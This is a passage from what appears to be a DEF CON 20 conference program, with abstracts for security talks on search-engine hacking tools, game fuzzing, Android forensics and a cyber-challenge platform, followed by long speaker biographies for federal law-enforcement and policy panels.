* PortScanDiggity – How would you like to get Google to do your port scanning for you? Using undocumented functionality within Google, we’ve been able to turn Google into an extremely effective network port s canning tool. You can provide domains, hostnames, and even IP address ranges to scan in order to identify open ports ranging across all 65,535 TCP ports. An additional benefit is that this port scanning is completely passive – no need to directly communicate with target networks since Google has already performed the scanning for you.



* CloudDiggity Data Mining Tool Suite – Ever wanted to data mine every single password, email, SSN, credit card number on the Internet? Our new cloud tools combine Google/Bing hacking and data loss prevention (DLP) scanning on a massive scale, made possible via the power of cloud computing. Chuck Norris approved.



* CodeSearchDiggity-Cloud Edition – Google recently shut down Code Search in favor of focusing on Google+, putting “more wood behind fewer arrows”. I suppose we could have let the matter go, and let CodeSearchDiggity die, but that would be the mature thing to do. Instead, we are harnessing the power of the cloud to keep the dream alive – i.e. performing source code security analysis of nearly every single open source code project in existence, simultaneously.



* BingBinaryMalwareSearch (BBMS) – According to the Verizon 2012 DBIR, malware was used to compromise a staggering 95% of all records breached for 2011. BBMS allows users to proactively track down and block sites distributing malware executables on the web. The tool leverages Bing, which indexes executable files, to find malware based on executable file signatures (e.g. “Time Stamp Date:”, “Size of Code:”, and “Entry Point:”).



* Diggity IDS – Redesigned intrusion detection system (IDS) for search engine hacking. Will still leverage the wealth of information provided by the various Diggity Alert RSS feeds, but will also make more granular data slicing and dicing possible through new and improved client tools. Also includes the frequently requested SMS/email alerting capabilities, making it easier than ever for users to keep tabs on their vulnerability exposure via search engines.



So come ready to engage us as we explore these tools and more in this DEMO rich presentation. You are cordially invited to ride the lightning.



Francis Brown CISA, CISSP, MCSE, is a Managing Partner at Stach & Liu, a security consulting firm providing IT security services to the Fortune 500 and global financial institutions as well as U.S. and foreign governments. Before joining Stach & Liu, Francis served as an IT Security Specialist with the Global Risk Assessment team of Honeywell International where he performed network and application penetration testing, product security evaluations, incident response, and risk assessments of critical infrastructure. Prior to that, Francis was a consultant with the Ernst & Young Advanced Security Centers and conducted network, application, wireless, and remote access penetration tests for Fortune 500 clients.



Francis has presented his research at leading conferences such as Black Hat USA, DEF CON, InfoSec World, ToorCon, and HackCon and has been cited in numerous industry and academic publications.



Francis holds a Bachelor of Science and Engineering from the University of Pennsylvania with a major in Computer Science and Engineering and a minor in Psychology. While at Penn, Francis taught operating system implementation, C programming, and participated in DARPA-funded research into advanced intrusion prevention system techniques.

Facebook: StachLiu





Rob Ragan is a Senior Security Associate at Stach & Liu, a specialized security consulting firm serving the Fortune 1000 and high-tech startups. We protect our clients from the bad guys by breaking-in and bending the rules before the hackers do. From critical infrastructure to credit cards, popular websites to mobile games, and flight navigation systems to frozen waffle factories, we're there.



Before joining Stach & Liu, Rob served as a Software Engineer with the Application Security Center team of Hewlett-Packard (formerly SPI Dynamics) where he developed automated web application security testing tools, performed penetration tests, and researched vulnerabi lity assessment and identification techniques. Rob has presented his research at leading conferences such as Black Hat, DEF CON, SummerCon, InfoSec World, HackCon, OuterZ0ne, and HackerHalted. He has published several white papers and is a contributing author to the Hacking Exposed: Web Applications 3rd edition.

Twitter: @sweepthatleg

Facebook: StachLiu

Project

return to top

KinectasploitV2: Kinect Meets 20 Security Tools

Last year saw the release of Kinectasploit v1 linking the Kinect with Metasploit in a 3D, first person shooter environment. What if we expanded Kinectasploit to use 20 security tools in honor of DEF CON's 20th anniversary?!



Jeff Bryner Jeff has toiled for over 20 years integrating systems, performing incident response and forensics and ultimately fixing security issues. He writes for the SANS forensic blog, has spoken at RSA on SCADA security issues, DEF CON 18 on privacy issues with the google toolbar, released kinectasploit v1 at DEF CON 19 and runs p0wnlabs.com just for fun.

Twitter: @p0wnlabs

p0wnlabs.com

return to top

Fuzzing Online Games

Fuzzing online games to find interesting bugs requires a unique set of novel techniques.



In a nutshell the lack of direct access to the game server and having to deal with clients that are far too complex to be easily emulated force us to rely on injecting fuzzing data into a legitimate connections rather than use the standard replay execution approach. Top that with heavily encrypted and complex network protocols and you start to see why we had to become creative to succeed :)



In this talk, we will discuss and illustrate the novels techniques we had to develop to be able to fuzz online games, including how to successfully inject data into a gaming sessions and how to instrument the game memory to know that our fuzzing was successful. We will also tell you how to find and reverse the interesting part of the protocol, and how to decide when to perform the injection.



Elie Bursztein is a researcher at Google's Mountain View, Calif. headquarters, where he invents ways to fix the Internet's security and privacy problems. Prior to that as a researcher at Stanford University, Elie designed Wikipedia's CAPTCHA and created Talisman, a Chrome browser extension that enhances security. He is also the inventor of the award-winning game hacking tool Kartograph presented at DEF CON 18 and Security and Privacy 2011.

Twitter: @elie

http://elie.im



Patrick Samy is research engineer at Stanford university where he focuses on hardware and system security. He is the lead developer of Kartograph network and scripting engine. He also developed the Kartograph real-time visualization engine.



return to top

The Open Cyber Challenge Platform

Everyone from MIT to the DoD have agreed that teaching cyber security using cyber challenges, where groups of students attack or defend a live network, has proven to be an incredibly effective educational tactic. Unfortunately, current cyber challenge tools also suffer from being very hard to configure, and/or very expensive, and/or limited to certain audiences (e.g. the military), which makes them inaccessible to high schools, colleges, and smaller organizations. The Open Cyber Challenge Platform aims to help fix this by providing a free, open-source, cyber challenge software platform that is reasonable in terms of cost of required hardware and required technical installation/maintenance expertise, as well as easily extensible to allow the vast open source community to provide additional modules that reflect new challenges and scenarios. If you're interested in the future of cyber-security education, or simply just want to learn about a new potential training tool, come check out the OCCP.



Linda C. Butler is a computer science student currently interning at the University of Rhode Island's Digital Forensics and Cyber Security Program. Past activities include an internship in the NASA Engineering department at Kennedy Space Center, a backpacking trip through New Zealand, and performing at a renaissance faire. She's an OWASP member and past DEFCON Attendee, and finds the interaction between security, privacy, and society an endlessly fascinating area of study.



return to top

Into the Droid: Gaining Access to Android User Data

This talk details a selection of techniques for getting the data out of an Android device in order to perform forensic analysis. It covers cracking lockscreen passwords, creating custom forensic ramdisks, bypassing bootloader protections and stealth real-time data acquisition. We’ll even cover some crazy techniques - they may get you that crucial data when nothing else will work, or they may destroy the evidence!



Forensic practitioners are well acquainted with push-button forensics software. They are an essential tool to keep on top of high case loads – plug in the device and it pulls out the data. Gaining access to that data is a constant challenge against sophisticated protection being built into modern smartphones. Combined with the diversity of firmware and hardware on the Android platform it is not uncommon to require some manual methods and advanced tools to get the data you need.



This talk will reveal some of the techniques forensic software uses behind the scenes, and will give some insight into what methods and processes blackhats and law enforcement have at their disposal to get at your data. Free and Open Source tools will be released along with this talk to help you experiment with the techniques discussed.



Note that this talk does not discuss Android analysis basics such as how to use ADB or what the SDK is - it is assumed you know these or can easily look them up afterwards.



Thomas Cannon is the Director of Research and Development for viaForensics, a Chicago based digital forensics and security company. Thomas spends the majority of his time researching new mobile security, malware and forensics techniques and getting them into the hands of customers for commercial, research or military application. He conducts penetration testing and code analysis of mobile applications for clients in industries such as banking/finance and retail.



Thomas is known for his research on Android having published advisories for new vulnerabilities and demonstrated attacks on the platform as well as providing some early guides on reverse engineering Android applications. Thomas has spoken at international conferences and presented to law enforcement on the topic of mobile forensics. Thomas has had a number of articles published in industry magazines and also been interviewed on national news programmes regarding vulnerabilities in payment systems and mobile technology.

Twitter: @thomas_cannon

https://viaforensics.com

http://thomascannon.net

return to top

Panel: Meet the Feds 1 - Law Enforcement

Did you ever wonder if the Feds were telling you’re the truth when you asked a question? Join current and former federal agents from numerous agencies to discuss cyber investigations and answer your burning questions. Enjoy the opportunity to grill ‘em and get down to the bottom of things!



Agencies that will have representatives include: Defense Cyber Crime Center (DC3), National White Collar Crime Center (NWC3), US Department of Treasury, Internal R evenue Service (IRS), and the US Navy SEALs. This year, the “Meet the Feds” panel has gone Hollywood with special guests - Mr. David McCallum and Mr. Leon Carroll from CBS’s NCIS!



Each of the agency reps will make an opening statement regarding their agencies role, and then open it up to the audience for questions.



Jim Christy is a retired special agent that has specialized in cyber crime investigations and digital forensics for over 26 years with the Air Force Office of Special Investigation and over 40 years of federal service. Jim returned to the federal government first as an IPA and now as an HQE and is the Director of Futures Exploration (FX) for the Department of Defense Cyber Crime Center (DC3). FX the DC3 innovation incubator is responsible for outreach/marketing, and strategic relationships with other government organizations, private sector, and academia for DC3. He was profiled in Wired Magazine in January 2007.



Jim consulted with David Marconi (writer of Enemy of the State, Mission Impossible 2 & Live Free or Die Hard) and contributed technical advice on critical infrastructure attacks used in the movie Live Free or Die Hard.



In May 2011, the Air Force graduated the first NCO’s for a new AF career field, Cyber Defense Operations at Keesler AFB, MS. The staff of the course honored Jim by presenting the top graduate of the class with the “Jim Christy Award”. In 2006, Christy created the DC3 Digital Forensics Challenge an international competition that in 2011 had 1,800 participants spanning all 50 states and 53 countries. The exercises are designed to develop, hone, and engage participants in the fields of cyber investigation, digital forensics, and cyber security. It is one of the first venues to employ crowd sourcing in “real world” mission focused solution development.



In Oct 2003, the Association of Information Technology Professionals awarded Jim the 2003 Distinguished Information Science Award winner for his outstanding contribution through distinguished services in the field of information management. Previous recipients of this prestigious award include Admiral Grace Hopper, Gene Amdahl, H. Ross Perot, General Emmett Paige, Bill Gates, Lawrence Ellison, David Packard and Mitch Kapor.



From 17 Sep 01 – 1 Nov 03, Jim was the Deputy Director/Director of Operations, Defense Computer Forensics Lab, DC3. As the Dir of Ops for the DCFL he managed four sections with over 40 computer forensic examiners that supported Major Crimes & Safety, Counterintelligence and Counterterrorism, as well as Intrusions and Information Assurance cases for the Department of Defense.



Leon Carroll grew up in Chicago and graduated from North Dakota State University (where he played on college Division II National Championship football teams). He served 6 years in the Marines and then continued in the Marine Reserves in Long Beach (under the command of PV Sunset member Lt Col Jacques Naviaux).



Carroll was a member of the U.S. Marine Corps when he joined NCIS in 1980. Leon worked at a halfway house for pre-release felons in Fargo, North Dakota, and then became a special agent with the Naval Investigative Service, later known as the Naval Criminal Investigative Service (NCIS), serving in several places including Panama and aboard the USS Ranger.



He retired two decades later, but returned after 9/11, serving another year and a half to help with the agency's expanded role in counter-terrorism. After his second retirement, he and his wife moved to the Los Angeles area.



As a retired NCIS agent with over 20 years of experience, Mr. Carroll received an unexpected opportunity to work as a technical adviser to the NCIS TV program in Los Angeles. He was recruited in 2003 by the producers who said they needed someone who could provide the show with the “spit-polish shine of authenticity.”



Working on both NCIS and NCIS Los Angeles, Mr. Carroll is a technical adviser to the script writers, actors and director, and has also written scripts for a few episodes himself. He works under the leadership of Mark Hyman of football fame. They do 24 episodes per season.



Andy Fried is a Senior Consultant with Cutter Consortium's Business Technology Strategies and Government & Public Sector practices. His unique skill set has earned him a worldwide reputation; his background includes working as a uniformed police officer, a computer programmer and security analyst, and a Senior Special Agent with the US Department of the Treasury, a post he retired from after a 20-year career. Mr. Fried's extensive knowledge allows him to identify large data sources that are seemingly unrelated and combine them to produce findings that would not be otherwise identified. His passion and tenacity for identifying and stopping Internet criminal activity has earned him the respect of leading industry experts. During his last two years at the US Treasury, Mr. Fried was credited with identifying and mitigating over 3,000 fraudulent online schemes. He currently works as a security researcher for a nonprofit organization involved in identifying organized criminal enterprises responsible for fraudulent schemes, denial-of-service attacks, malware propagation, and large-scale botnets. Mr. Fried's work routinely involves data mining and analysis of data sets that contain hundreds of millions of records.



Early in his career, Mr. Fried was a programmer for Bionetics, a life sciences medical research group at the Kennedy Space Center, where he became a technology evangelist, identifying work processes that could be automated, conducting R&D for new computer hardware and software programs, and assisting biostatisticians in aggregating and processing the voluminous research data generated by data acquisition systems. At Bionetics, Mr. Fried was tasked with providing technical support to NASA's Internal Security Office, including one high-profile case involving the arrest and investigation of a kidnapper/rapist. At NASA's suggestion, he moved from Bionetics into a computer security analyst position within the newly formed Lockheed Space Operations Corporation (LSOC). He soon became involved in processing and analyzing digital data related to the kidnapping/rape investigation and developed a suite of forensic software programs. His software became the first set of programs designed specifically for use by law enforcement and was adopted by the FBI, IRS, and Air Force Office of Special Investigations. Soon after, the IRS recruited Mr. Fried for a Special Agent position, citing a need to develop the capability to detect, investigate, and prosecute computer-related crimes. He went on to help establish the Criminal Investigation Division's Computer Investigative Specialist (CIS) program, a similar program for IRS Inspection, the System Intrusion and Network Attack Response Team (SINART), and the Computer Security Incident Response Capability (CSIRC).



More recently, Mr. Fried developed databases and innovative techniques to proactively detect online schemes targeting the IRS. He identified various sources of intelligence and information, developed strategic alliances with private organizations, and designed automated systems to obtain and analyze large data sets for the purpose of identifying and mitigating online schemes. Mr. Fried also designed, developed, and implemented his agency's network-based digital video surveillance system. He additionally developed strategic alliances with a large number of domain registrars, ISPs, government- sponsored CERTs, and private organizations involved in various forms of network security for the purpose of increasing the ability to mitigate fraudulent behavior as quickly as possible. In 2008, Mr. Fried presented a proposal to IRS management to form a new division whose sole mission was to monitor, detect, and mitigate online fraudulent schemes targeting the IRS and US taxpayers. The proposal was adopted and led to the formation of IRS Online Fraud Detection and Prevention (OFDP).



Mr. Fried is on the executive board of directors of the Fraternal Order of Police in Washington, DC, and is affiliated with several security organizations that cannot be named. He is a frequent presenter at Black Hat and DEF CON. Mr. Fried has a BS degree in criminology.



Jon Iadonisi is the founder of White Canvas Group – a company that specializes in cultivating alternative and disruptive strategies. His depth of experience, diversified expertise, and unique operational background has provided a perspective that has enabled him to contribute to solving national security problems. He has spent the past fifteen years using innovative computing technologies coupled with cutting edge scholarship to solve complex problems, some of which later became implemented as new strategies and capabilities for the U.S. Government. He is regularly sought by the Department of Defense, various Intelligence agencies, and members of the US Congress to provide expert opinion and briefings on information age unconventional warfare. Prior to joining the private sector, Jon served as a Navy SEAL, where he designed, planned and led various combat operations that integrated innovative technologies and tactics into the operating environment, ultimately creating new capabilities for the Special Operations Community and Central Intelligence Agency. He is a combat-wounded and decorated veteran who earned a B.S. in Computer Science from the US Naval Academy, and M.S. in Homeland Security from San Diego State University. He is a member of the Council on Foreign Relations and guest lectures at San Diego State University and Georgetown Law School. He is an academic and athletic all American who participated in the 2000 Olympic Rifle team trials. He enjoys fine wine, good books, music, and outdoors activities.



Rich Marshall is the Founder and President of X-SES Consultants, LLC, the former Vice President of Cyber Programs at Triton FSI and is a nationally and internationally recognized thought leader on cyber related issues. He provides an impressive professional network and is known for facilitating the establishment of programs and contracts. He has extensive leadership experience in formulating growth strategies, integrating policy, culture and training with technology issues, building relationships and delivering lasting results. He is also a strategic thinker who knows how to lead and very importantly, knows where to lead. He previously was a member of the Senior Cryptologic Executive Service (SCES) and the Defense Intelligence Senior Executive Service (DISES). Prior to joining Triton FSI, he was the Director of Global Cyber Security Management, National Cyber Security Division, Department of Homeland Security (DHS) by special arrangement between the Director, National Security Agency (DIRNSA) and the Secretary of DHS. Within DHS he directed National Cyber Security Education Strategy; and the Software Assurance; Research and Standards Integration; and Supply Chain Risk Management programs.



Mr. Marshall was previously the Senior Information Assurance (IA) Representative, Office of Legislative Affairs at the National Security Agency (NSA) where he served as the Agency's point of contact for all NSA Information Security (INFOSEC) matters concerning Congress. He devised the IA legislative strategy, helped shape the passage of the revised Foreign Intelligence Surveillance Act and was the Comprehensive National Cyber Security Initiative (CNCI).



In 2001, Mr. Marshall was selected by the Cyber Advisor to the President to serve as the Principal Deputy Director, Critical Infrastructure Assurance Office (CIAO), where he led a team of 40 dedicated professionals in developing, coordinating and implementing the Administration's National Security for Critical Infrastructure Protection initiative and the National Cyber Security Strategy to address potential threats to the nation's critical infrastructures.



From 1994 to 2001, Mr. Marshall served with distinction as the Associate General Counsel for Information Systems Security/Information Assurance, Office of the General Counsel, National Security Agency. In that capacity, Mr. Marshall provided advice and counsel on national security telecommunications and technology transfer policies and programs, national security telecommunications technical security programs, the National Information Assurance Partnership, the Common Criteria Mutual Recognition Arrangement, legislative initiatives and international law. Mr. Marshall was the legal architect for the Joint Chiefs of Staff directed exercise "Eligible Receiver 97" that spotlighted many of the cyber-vulnerabilities of our nation's critical infrastructures and helped bring focus on this issue at the national leadership level.



Mr. Marshall graduated from The Citadel with a B.A. in Political Science; Creighton University School of Law with a J.D. in Jurisprudence; Georgetown School of Law with an LL.M. in International and Comparative Law; was a Fellow at the National Security Law Institute, University of Virginia School of Law in National Security Law; attended the Harvard School of Law Summer Program for Lawyers; the Georgetown University Government Affairs Institute on Advanced Legislative Strategies and participated in the Information Society Project at Yale Law School and in the Privacy, Security and Technology in the 21st Century program at Georgetown University School of Law.



David McCallum: Born David Keith McCallum, Jr. in Glasgow, Scotland on Sept. 19, 1933, he was the son of David McCallum, Sr., the famed principal violinist for numerous orchestras in the United Kingdom, including the Royal Philharmonic Orchestra, and cellist Dorothy Dorman. After studying at the Royal Academy of Dramatic Arts, he made his debut in a 1946 BBC Radio production of "Whom the Gods Love, Die Young." Bit and supporting roles in British features and on television soon followed, often as troubled youth, as benefitting his brooding intensity. Among his more notable turns during his period was in 1958's "Violent Playground," where his psychotic gang member is spurred by poverty and rock and roll to take a classroom of school children hostage.



McCallum's American film debut came as the mother-fixated Carl von Schlosser in John Huston's "Freud" (1962), with Montgomery Clift as the pioneering analyst. The following year, he played Royal Navy Officer Ashley-Pitt, who devised the method of dispersing the dirt from tunnels dug under a POW camp in "The Great Escape" (1963). An early American television appearance on "The Outer Limits" (CBS, 1963-65) became one of his most enduring, thanks to the eye-popping makeup applied to McCallum. His character, a bitter Welsh miner, agreed to take part in an evolutionary experiment, which turned him into a hyper-intelligent mutant with a massive domed cranium. The image was memorable enough to make McCallum a go-to for numerous science fiction efforts in the ensuing decades.



In 1964, McCallum was cast as Illya Kuryakin, a minor character on the spy series "The Man from U.N.C.L.E." Despite having only two lines, the producers saw that McCallum and star Robert Vaughn had considerable chemistry together, and boosted the character to co-star status. The move changed McCallum's career forever. Kuryakin's cool demeanor, physical proficiency with any weapon, and passion for art, music and science - not to mention his wealth of blonde hair - made him an immediate favorite among female viewers, whose fan mail to the actor was the most ever received in the history of MGM, which produced the show. For the series' three years on the air, McCallum was at the apex of television stardom, and netted two Emmy nominations and a Golden Globe nod, as well as major roles in several films. He was the tormented Judas in George Stevens' epic Biblical drama "The Greatest Story Ever Told" (1965), and took the lead in a number of minor features, including 1968's "Sol Madrid" and "Mosquito Squadron" (1969), many of which traded on McCallum's popularity in "U.N.C.L.E." by casting him in action-oriented roles. During this period, McCallum also orchestrated and conducted a trio of lush, sonically adventurous records that put unique spins on some of the period's more popular songs.



In the 1970s, McCallum was a fixture on television in both America and England. In the States, he was a staple of science fiction and supernaturally-themed TV features, including "Hauser's Memory" (NBC, 1970), as a scientist who injected himself with a dying colleagues brain fluid to preserve defense secrets from foreign agents, while "She Waits" (CBS, 1972) cast him as the husband to a possessed Patty Duke. He also briefly returned to series work with "The Invisible Man" (NBC, 1975-76) as a scientist who used his invisibility formula to aid a government agency against evildoers. His work in England hewed more towards dramatic fare: in "Colditz" (BBC, 1972-74), he was an aggressive RAF officer who put aside his anger towards the Nazis to help organize an escape from a notorious German war prison, while in "Sapphire & Steel" (ITV, 1979- 1982), he and Joanna Lumley played extraterrestrial operatives who investigated strange incidents involving the time-space continuum. In 1983, he reunited with Robert Vaughn for "The Return of the Man from U.N.C.L.E." (CBS), which saw Illya retired from espionage to design women's clothing in New York. The escape of a top enemy spy brings both U.N.C.L.E. men back into action, albeit with other, younger agents. The TV- movie was intended as the pilot for a new version of the series, but the show was never greenlit.



After logging time on countless, unmemorable series like "Team Knight Rider" (syndicated, 1997-98) and "The Education of Max Bickford" (CBS, 2001-02), McCallum found his next hit with "NCIS," a police procedural drama about Navy investigators. McCallum played Chief Medical Examiner Donald "Ducky" Mallard, an eccentric but highly efficient investigator with a knack for psychological profiling. A close confidante to Mark Harmon's Jethro Gibbs, he served as father confessor and paternal figure for the show's offbeat cast of characters. The show's slow-building popularity brought McCallum back to a television audience made up in part of the children of viewers who sent him fan letters back in the "U.N.C.L.E." days, granting him a rare burst of second stardom.



Justin Wykes joined the National White Collar Crime Center in December 2006 as a Computer Crime Specialist. He is currently responsible for the development and updating of the "Basic Cell Phone Investigations" course as well as instructing multiple basic and advanced level courses.



He has ten years experience building, fixing and repairing computers, and earned his A+ certification in September of 2006. After earning a Bachelor of Science degree from Grand Valley State University in Criminal Justice, with an emphasis in Law Enforcement, Mr. Wykes spent five years as a Special Agent for US Army Counterintelligence. The last two of those years were spent as a computer forensic examiner for the Cyber Counterintelligence Activity. As a Special Agent for CCA, Mr. Wykes conducted multi-agency investigations in security compromises, espionage, and terrorism.





return to top

Meet the Feds 2 - Policy

Did you ever wonder if the Feds were telling you’re the truth when you asked a question? Join current and former federal agents from numerous agencies to discuss cyber policy and answer your burning questions. Enjoy the opportunity to grill ‘em and get down to the bottom of things!



Agencies that will have representatives include: Defense Cyber Crime Center (DC3), Department of Homeland Security (DHS), United States Computer Emergency Readiness Team (US CERT), Office of the Secretary of Defense Networks and Information Integration (OSD/NII), National Security Agency (NSA), National Defense University (NDU), and Virginia Tech.



Each of the agency reps will make an opening statement regarding their agencies role, and then open it up to the audience for questions.



Jim Christy is a retired special agent that has specialized in cyber crime investigations and digital forensics for over 26 years with the Air Force Office of Special Investigation and over 40 years of federal service. Jim returned to the federal government first as an IPA and now as an HQE and is the Director of Futures Exploration (FX) for the Department of Defense Cyber Crime Center (DC3). FX the DC3 innovation incubator is responsible for outreach/marketing, and strategic relationships with other government organizations, private sector, and academia for DC3. He was profiled in Wired Magazine in January 2007.



Jim consulted with David Marconi (writer of Enemy of the State, Mission Impossible 2 & Live Free or Die Hard) and contributed technical advice on critical infrastructure attacks used in the movie Live Free or Die Hard.



In May 2011, the Air Force graduated the first NCO’s for a new AF career field, Cyber Defense Operations at Keesler AFB, MS. The staff of the course honored Jim by presenting the top graduate of the class with the “Jim Christy Award”. In 2006, Christy created the DC3 Digital Forensics Challenge an international competition that in 2011 had 1,800 participants spanning all 50 states and 53 countries. The exercises are designed to develop, hone, and engage participants in the fields of cyber investigation, digital forensics, and cyber security. It is one of the first venues to employ crowd sourcing in “real world” mission focused solution development.



In Oct 2003, the Association of Information Technology Professionals awarded Jim the 2003 Distinguished Information Science Award winner for his outstanding contribution through distinguished services in the field of information management. Previous recipients of this prestigious award include Admiral Grace Hopper, Gene Amdahl, H. Ross Perot, General Emmett Paige, Bill Gates, Lawrence Ellison, David Packard and Mitch Kapor.



From 17 Sep 01 – 1 Nov 03, Jim was the Deputy Director/Director of Operations, Defense Computer Forensics Lab, DC3. As the Dir of Ops for the DCFL he managed four sections with over 40 computer forensic examiners that supported Major Crimes & Safety, Counterintelligence and Counterterrorism, as well as Intrusions and Information Assurance cases for the Department of Defense.



Rod Beckstrom is a highly successful entrepreneur, founder and CEO of a publicly-traded company, a best-selling author, avowed environmentalist, public diplomacy leader and, most recently, the head of a top-level federal government agency entrusted with protecting the nation’s communication networks against cyber attack.



Throughout 2008, Rod served as the Director of the National Cybersecurity Center (NCSC) at the U.S. Department of Homeland Security, where he reported to the Secretary of DHS, and was charged with cooperating directly with the Attorney General, National Security Council, Secretary of Defense, and the Director of National Intelligence (DNI). Prior to joining DHS, he served on the DNI’s Senior Advisory Group. Rod is unique in having experienced the inner workings of two, highly-charged, often competing, federal security agencies created in the wake of the September 11th attacks, an event that he says, “changed my life.”



Rod is widely regarded as a pre-eminent thinker and speaker on issues of cybersecurity and related global issues, as well as on organizational strategy and leadership. He is also an expert on how carbon markets and “green” issues affect business. While Director of the NCSC, Rod developed an effective working group of leaders from the nation's top six cybersecurity centers across the civilian, military and intelligence communities. His work led to his development of a new economic theory that provides an explicit model for valuing any network, answering a decades-old problem in economics.



Rod co-authored four books including The Starfish and the Spider: The Unstoppable Power of Leaderless Organizations, a best-selling model for analyzing organizations, leadership styles, and competitive strategy. The Starfish and the Spider has been translated into 16 foreign editions and is broadly quoted.



At age 24, Rod started his first company in a garage apartment and, subsequently, grew it into a global enterprise with offices in New York, London, Tokyo, Geneva, Sydney, Palo Alto, Los Angeles, and Hong Kong. CATS Software Inc., went public and later sold. Nobel Laureates Myron Scholes and William F. Sharpe served on the company's boards of directors and advisors. While at CATS Rod helped advance the financial theory of “value at risk,” now used globally for all key banking risk management. Rod co- edited the first book to introduce “value at risk.” Rod also co-founded Mergent Systems, a pioneer in inferential database engines, which Commerce One later acquired for $200 million. He has co-launched other collaborations, software, and internet service businesses, as well. From 1999 to 2001, he served as Chairman of Privada, Inc, a leader in technology enabling private, anonymous, and secure credit card transactions over the internet.



In 2003, Rod co-founded a global peace network of CEO's which initiated Track II diplomatic efforts between India and Pakistan. The group’s symbolic actions opened the borders to people and trade, and contributed to ending the most recent Indo-Pak conflict. It's one of several non-profit groups and initiatives Rod has started. He now serves on the boards of the Environmental Defense Fund, which Fortune Magazine ranked as one of the seven most powerful boards in the world and Jamii Bora Trust an innovative micro-lending group in Africa with more than 200,000 members.



He is a graduate of Stanford University with an MBA and a BA with Honors and Distinction. He served as Chairman of the Council of Presidents of the combined Stanford student body (ASSU) and was a Fulbright Scholar at the University of St. Gallen in Switzerland.



Rich Marshall is the Founder and President of X-SES Consultants, LLC, the former Vice President of Cyber Programs at Triton FSI and is a nationally and internationally recognized thought leader on cyber related issues. He provides an impressive professional network and is known for facilitating the establishment of programs and contracts. He has extensive leadership experience in formulating growth strategies, integrating policy, culture and training with technology issues, building relationships and delivering lasting results. He is also a strategic thinker who knows how to lead and very importantly, knows where to lead. He previously was a member of the Senior Cryptologic Executive Service (SCES) and the Defense Intelligence Senior Executive Service (DISES). Prior to joining Triton FSI, he was the Director of Global Cyber Security Management, National Cyber Security Division, Department of Homeland Security (DHS) by special arrangement between the Director, National Security Agency (DIRNSA) and the Secretary of DHS. Within DHS he directed National Cyber Security Education Strategy; and the Software Assurance; Research and Standards Integration; and Supply Chain Risk Management programs.



Mr. Marshall was previously the Senior Information Assurance (IA) Representative, Office of Legislative Affairs at the National Security Agency (NSA) where he served as the Agency's point of contact for all NSA Information Security (INFOSEC) matters concerning Congress. He devised the IA legislative strategy, helped shape the passage of the revised Foreign Intelligence Surveillance Act and was the Comprehensive National Cyber Security Initiative (CNCI).



In 2001, Mr. Marshall was selected by the Cyber Advisor to the President to serve as the Principal Deputy Director, Critical Infrastructure Assurance Office (CIAO), where he led a team of 40 dedicated professionals in developing, coordinating and implementing the Administration's National Security for Critical Infrastructure Protection initiative and the National Cyber Security Strategy to address potential threats to the nation's critical infrastructures.



From 1994 to 2001, Mr. Marshall served with distinction as the Associate General Counsel for Information Systems Security/Information Assurance, Office of the General Counsel, National Security Agency. In that capacity, Mr. Marshall provided advice and counsel on national security telecommunications and technology transfer policies and programs, national security telecommunications technical security programs, the National Information Assurance Partnership, the Common Criteria Mutual Recognition Arrangement, legislative initiatives and international law. Mr. Marshall was the legal architect for the Joint Chiefs of Staff directed exercise "Eligible Receiver 97" that spotlighted many of the cyber-vulnerabilities of our nation's critical infrastructures and helped bring focus on this issue at the national leadership level.



Mr. Marshall graduated from The Citadel with a B.A. in Political Science; Creighton University School of Law with a J.D. in Jurisprudence; Georgetown School of Law with an LL.M. in International and Comparative Law; was a Fellow at the National Security Law Institute, University of Virginia School of Law in National Security Law; attended the Harvard School of Law Summer Program for Lawyers; the Georgetown University Government Affairs Institute on Advanced Legislative Strategies and participated in the Information Society Project at Yale Law School and in the Privacy, Security and Technology in the 21st Century program at Georgetown University School of Law.



Jerry Dixon currently serves as Director of Analysis for Team Cymru and was the former Director of the National Cyber Security Division (NCSD) & US-CERT, of the Department of Homeland Security. He continues to advise partners on national cyber-security threats, aides organizations in preparing for cyber-attacks, and assists with the development of cyber-security policies for organizations.



Mischel Kwon is an IT executive with more than 29 years of experience ranging from application design and development, network architecture and deployment, Information Assurance policy, audit and management, technical defensive security, large wireless system security, to building organizational and national level Computer Emergency/Incident Response/Readiness Teams.



Ms. Kwon currently serves as the President of Mischel Kwon Associates, a security consulting firm specializing in Technical Defensive Security, Security Operations and Information Assurance.



Most recently, as the Vice President of Public Sector Security for RSA Security, Ms. Kwon was responsible for leading RSA in assisting the public sector security solutions, strategies, technologies and policy.



Ms. Kwon was named the Director for the United States Computer Emergency Readiness Team (US-CERT) in June 2008 where she spearheaded the organization responsible for analyzing and reducing cyber threats and vulnerabilities in federal networks, disseminating cyber threat warning information and coordinating national incident response activities.



Kwon brings a unique blend of hands on experience, academic research and training, and a seasoned understanding of how to build operational organizations from inception. Among her successes at the United States Department of Justice (DOJ), where she was Deputy Director for IT Security Staff; she built and deployed the Justice Security Operations Center (JSOC) to monitor and defend the DOJ network against cyber threats.



Ms. Kwon holds a Master of Science in Computer Science and a graduate certificate in Computer Security and Information Assurance. In addition, she serves as an adjunct professor at George Washington University in Washington, DC, where Ms. Kwon also runs the GW Cyber Defense Lab.



Riley Repko remains committed to building the ‘knowledge-bridge’ between the innovator (the solver) with the requirement (the seeker). He has a long history of working with innovative small and medium sized companies and entrepreneurs leveraging his know-how to drive business. A constant and responsive connector, he is most comfortable strategizing with key industry decision-makers at the highest levels of government, between leading-edge cyber solution providers, venture capitalists, the white-hat 'wizards' and the R&D community. Today, Riley serves as both a cyber-secuirty consultant and a Senior Research Fellow in Cyber Security for Virginia Tech, and as an affiliated faculty member with the Ted and Karyn Hume Center for National Security and Technology. Prior to joining Virginia Tech, Mr Repko served as the senior advisor for cyber operations for both the United States Air Force and to the Office of the Undersecretary for Cyber Policy within the Department of Defense.



Dr. Linton Wells II is the Director of the Center for Technology and National Security Policy (CTNSP) at National Defense University (NDU). He is also a Distinguished Research Professor and serves as the Transformation Chair. Prior to coming to NDU he served in the Office of the Secretary of Defense (OSD) from 1991 to 2007, serving last as the Principal Deputy Assistant Secretary of Defense (Networks and Information Integration). In addition, he served as the Acting Assistant Secretary and DoD Chief Information Officer for nearly two years. His other OSD positions included Principal Deputy Assistant Secretary of Defense (Command, Control, Communications and Intelligence-C3I) and Deputy Under Secretary of Defense (Policy Support) in the Office of the Under Secretary of Defense (Policy).



